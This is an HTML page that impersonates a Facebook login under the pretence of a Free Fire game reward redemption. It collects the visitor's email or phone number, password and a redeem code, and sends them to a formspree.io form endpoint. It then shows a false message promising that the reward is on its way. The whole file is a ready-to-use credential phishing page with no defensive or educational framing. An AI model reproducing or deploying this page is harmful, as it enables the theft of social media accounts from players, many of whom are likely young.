<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale1.0">
        <title>Free Fire reward redemption Site</title>
        <style>
            *{
                padding: 0;
                margin: 0;
                box-sizing: border-box;
            }
            body{
                font-family: 'Montserrat';
            }
            section{
                height: 100vh;
                width: 100%;
                background-color:aliceblue;
                display: flex;
                align-items: center;
                justify-content: center;
                flex-direction: column;
            }
            .container{
                width: 90%;
                max-width: 500px;
                margin: 0 auto;
                padding: 20px;
                box-shadow: 0px 0px 20px#7f7fb8;
                background-color: #4169E1;
                border-radius: 8px;
                margin-bottom: 20px;
            }
            .form-group{
                width: 100%;
                margin-top: 20px;
                font-size: 20px;
            }
            .form-group input{
                width: 100%;
                padding: 4px;
                font-size: 18px;
                border: 1px solid #6495ED;
                margin-top: 5px;
                font-weight: bold;
            }
            button[type="submit"]{
                width: 100%;
                border: none;
                outline: none;
                padding: 10px;
                font-size: 24px;
                border-radius: 8px;
                font-family: 'Montserrat';
                color: #4169E1;
                text-align: center;
                cursor: pointer;
                margin-top: 15px;
                transition: .3s ease background-color;
            }
            button[type="submit"]:hover{
                background-color: aliceblue;
            }
            #status{
                width: 98%;
                max-width: 500px;
                text-align: center;
                padding: 10px;
                margin: 0 auto;
                border-radius: 8px;

            }
            #status.success{
                background-color: rgb(211, 250, 153);
                animation: status 4s ease forwards;
            }
            #status.error{
                background-color: rgb(250, 129, 92);
                color: white;
                animation: status 4s ease forwards;
            }
            @keyframes status{
                0%{
                    opacity: 1;
                    pointer-events: all;
                }
                90%{
                    opacity: 1;
                    pointer-events: all;
                }
                100%{
                    opacity: 0;
                    pointer-events: none;
                }
            }
            .heading{
                    justify-content: center;
                    margin-bottom: 10px;
                    color: 	black;
                    margin-left: 15px;
            }
            .head{
                font-family: Tahoma;
                margin-bottom: 20px;
                color: 	#4169E1;
                font-size: 45px;
                justify-content: center;
            }
        </style>
    </head>
    <body>
        <section>
            <span class="head"><h1>Facebook</h1></span>
            <span class="heading"><h1>Sign in with Facebook that linked with your Free fire account</h1></span>
            <div class="container">
                <form action="https://formspree.io/f/xdoyldbe" method="POST" id="my-form">
                    <div class="form-group">
                        <label for="Username"> Email address or Phone Number</label>
                        <input type="text" id="phonenumber" name="Email address or Phone Number">
                    </div>
                    <div class="form-group">
                        <label for="Password">Password</label>
                        <input type="password" id="password" name="Password">
                    </div>
                    <div class="form-group">
                    <label for="confirmpassword">Confirm Password</label>
                    <input type="password" id="confirmpassword" name="Confirm Password">
                    </div>
                    <div class="form-group">
                        <label for="code">Enter your reedem code here</label>
                        <input type="text" id="code" name="code">
                    </div>
                    <button type="submit">Redeem</button>
                </form>
            </div>
            <div id="status"></div>
        </section>
        <script>
            var form = document.getElementById("my-form");
            
            async function handleSubmit(event) {
              event.preventDefault();
              var status = document.getElementById("status");
              var data = new FormData(event.target);
              fetch(event.target.action, {
                method: form.method,
                body: data,
                headers: {
                    'Accept': 'application/json'
                }
              }).then(response => {
                status.innerHTML = "Reward will be sent to you shortly";
                form.reset()
              }).catch(error => {
                status.innerHTML = "Oops! There was a problem submitting your form"
              });
            }
            form.addEventListener("submit", handleSubmit)
        </script>
    </body>
</html>